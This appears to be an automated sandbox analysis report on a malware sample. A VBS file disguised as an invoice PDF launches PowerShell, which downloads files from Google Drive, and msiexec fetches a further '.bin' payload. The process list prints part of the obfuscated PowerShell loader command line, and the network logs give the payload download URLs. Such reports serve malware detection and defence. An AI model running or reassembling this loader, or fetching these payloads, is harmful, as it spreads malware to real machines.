                                                                                        Mar 12, 2025 19:16:43.913825035 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.914832115 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.914901018 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.914906025 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.914977074 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.915921926 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.916001081 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.916022062 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.916069984 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.917009115 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.917090893 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.917097092 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.917145014 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.918061018 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.918117046 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.918121099 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.918169975 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.919101000 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.919157982 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.919162035 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.919219971 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.920296907 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.920375109 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.920381069 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.920433044 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.921334982 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.921421051 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.921426058 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.921539068 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.922338963 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.922400951 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.922405958 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.922467947 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.922472954 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.922518015 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.923450947 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.923551083 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.923556089 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.923604012 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.924525976 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.924599886 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.924606085 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.924657106 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.925579071 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.925628901 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.925635099 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.925694942 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.947022915 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.947108030 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.947115898 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.947180986 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.947436094 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.947500944 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.947505951 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.947563887 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.948651075 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.948709965 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.948715925 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.948775053 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.949323893 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.949423075 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.949429035 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.949476957 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.950568914 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.950654984 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.950659990 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.950710058 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.952548981 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.952620029 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.952625036 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.952701092 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.953469992 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.953521967 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.953527927 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.953579903 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.954821110 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.954873085 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.954943895 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.954945087 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.954952002 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.955010891 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.955374956 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.955492020 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.955497980 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.955564976 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.957226992 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.957314014 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.957319021 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.957367897 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.958201885 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.958312988 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.958318949 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.958384991 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.958710909 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.958776951 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.958781958 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.958851099 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.959100008 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.959187984 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.959192991 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.959242105 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.960763931 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.960869074 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.960874081 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.960988998 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.961533070 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.961601973 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.961616993 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.961668015 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.965462923 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.965550900 CET49697443192.168.2.7172.217.18.1
                                                                                        Mar 12, 2025 19:16:43.965557098 CET44349697172.217.18.1192.168.2.7
                                                                                        Mar 12, 2025 19:16:43.965629101 CET49697443192.168.2.7172.217.18.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 12, 2025 19:15:02.832035065 CET | 63140 | 53 | 192.168.2.7 | 1.1.1.1
Mar 12, 2025 19:15:02.841505051 CET | 53 | 63140 | 1.1.1.1 | 192.168.2.7
Mar 12, 2025 19:15:05.843420029 CET | 60041 | 53 | 192.168.2.7 | 1.1.1.1
Mar 12, 2025 19:15:05.850302935 CET | 53 | 60041 | 1.1.1.1 | 192.168.2.7
Mar 12, 2025 19:15:16.101320982 CET | 63793 | 53 | 192.168.2.7 | 1.1.1.1
Mar 12, 2025 19:15:16.108032942 CET | 53 | 63793 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 12, 2025 19:15:02.832035065 CET | 192.168.2.7 | 1.1.1.1 | 0x4b81 | Standard query (0) | Host_6637.6637.6637.657e | A (IP address) | IN (0x0001) | false
Mar 12, 2025 19:15:05.843420029 CET | 192.168.2.7 | 1.1.1.1 | 0x1e61 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Mar 12, 2025 19:15:16.101320982 CET | 192.168.2.7 | 1.1.1.1 | 0xaf60 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 12, 2025 19:14:47.380250931 CET | 1.1.1.1 | 192.168.2.7 | 0xe435 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.39 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 19:15:02.841505051 CET | 1.1.1.1 | 192.168.2.7 | 0x4b81 | Name error (3) | Host_6637.6637.6637.657e | none | none | A (IP address) | IN (0x0001) | false
Mar 12, 2025 19:15:05.850302935 CET | 1.1.1.1 | 192.168.2.7 | 0x1e61 | No error (0) | drive.google.com | | 216.58.206.46 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 19:15:06.297904968 CET | 1.1.1.1 | 192.168.2.7 | 0x2219 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 19:15:06.297904968 CET | 1.1.1.1 | 192.168.2.7 | 0x2219 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 19:15:16.108032942 CET | 1.1.1.1 | 192.168.2.7 | 0xaf60 | No error (0) | drive.usercontent.google.com | | 172.217.18.1 | A (IP address) | IN (0x0001) | false
                                                                                        • drive.google.com
                                                                                        • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49683 | 216.58.206.46 | 443 | 6648 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-12 18:15:07 UTC | 215 | OUT | GET /uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                        Host: drive.google.com
                                                                                        Connection: Keep-Alive
2025-03-12 18:15:08 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Wed, 12 Mar 2025 18:15:08 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'nonce-yxbNBBQthlLQ1olckLvzTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        1 | 192.168.2.7 | 49690 | 216.58.206.46 | 443 | 6648 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2025-03-12 18:15:15 UTC | 97 | OUT | GET /uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR HTTP/1.1
                                                                                        Host: drive.google.com
                                                                                        2025-03-12 18:15:16 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Wed, 12 Mar 2025 18:15:15 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-XJs7KLvfst9IMyZGASjOQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        2 | 192.168.2.7 | 49693 | 172.217.18.1 | 443 | 6648 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2025-03-12 18:15:18 UTC | 139 | OUT | GET /download?id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR&export=download HTTP/1.1
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        2025-03-12 18:15:21 UTC | 5009 | IN | HTTP/1.1 200 OK
                                                                                        X-GUploader-UploadID: AKDAyIttZZjpnec7Jv0bBUrVV71Yy8SvGhyVdpUik0--fjKTcAHOcKx6kKeosqzortNqwiSP
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Security-Policy: sandbox
                                                                                        Content-Security-Policy: default-src 'none'
                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                        X-Content-Security-Policy: sandbox
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Content-Disposition: attachment; filename="Fremtrdes.xsn"
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Credentials: false
                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 501772
                                                                                        Last-Modified: Tue, 11 Mar 2025 07:34:14 GMT
                                                                                        Date: Wed, 12 Mar 2025 18:15:20 GMT
                                                                                        Expires: Wed, 12 Mar 2025 18:15:20 GMT
                                                                                        Cache-Control: private, max-age=0
                                                                                        X-Goog-Hash: crc32c=5tNDzA==
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        3 | 192.168.2.7 | 49696 | 216.58.206.46 | 443 | 1100 | C:\Windows\SysWOW64\msiexec.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2025-03-12 18:16:36 UTC | 216 | OUT | GET /uc?export=download&id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                        Host: drive.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2025-03-12 18:16:37 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Wed, 12 Mar 2025 18:16:36 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'nonce-iFIDDJLhl5k5j8FOjPTzag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        4 | 192.168.2.7 | 49697 | 172.217.18.1 | 443 | 1100 | C:\Windows\SysWOW64\msiexec.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2025-03-12 18:16:39 UTC | 258 | OUT | GET /download?id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX&export=download HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        2025-03-12 18:16:42 UTC | 5012 | IN | HTTP/1.1 200 OK
                                                                                        X-GUploader-UploadID: AKDAyIuDtYw27_ygJX4VQIhfC27DTm_4EpdxzY8BC5p15NSx-FL_jTj7r_UXthX_h3WQZ7Yu
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Security-Policy: sandbox
                                                                                        Content-Security-Policy: default-src 'none'
                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                        X-Content-Security-Policy: sandbox
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Content-Disposition: attachment; filename="aQSVkjgtm168.bin"
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Credentials: false
                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 498752
                                                                                        Last-Modified: Tue, 11 Mar 2025 07:32:37 GMT
                                                                                        Date: Wed, 12 Mar 2025 18:16:41 GMT
                                                                                        Expires: Wed, 12 Mar 2025 18:16:41 GMT
                                                                                        Cache-Control: private, max-age=0
                                                                                        X-Goog-Hash: crc32c=fhuExg==
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close



                                                                                        Target ID:0
                                                                                        Start time:14:14:45
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs"
                                                                                        Imagebase:0x7ff626030000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:14:15:01
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\System32\PING.EXE
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:ping Host_6637.6637.6637.657e
                                                                                        Imagebase:0x7ff609a80000
                                                                                        File size:22'528 bytes
                                                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:14:15:01
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff642da0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:14:15:02
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. 
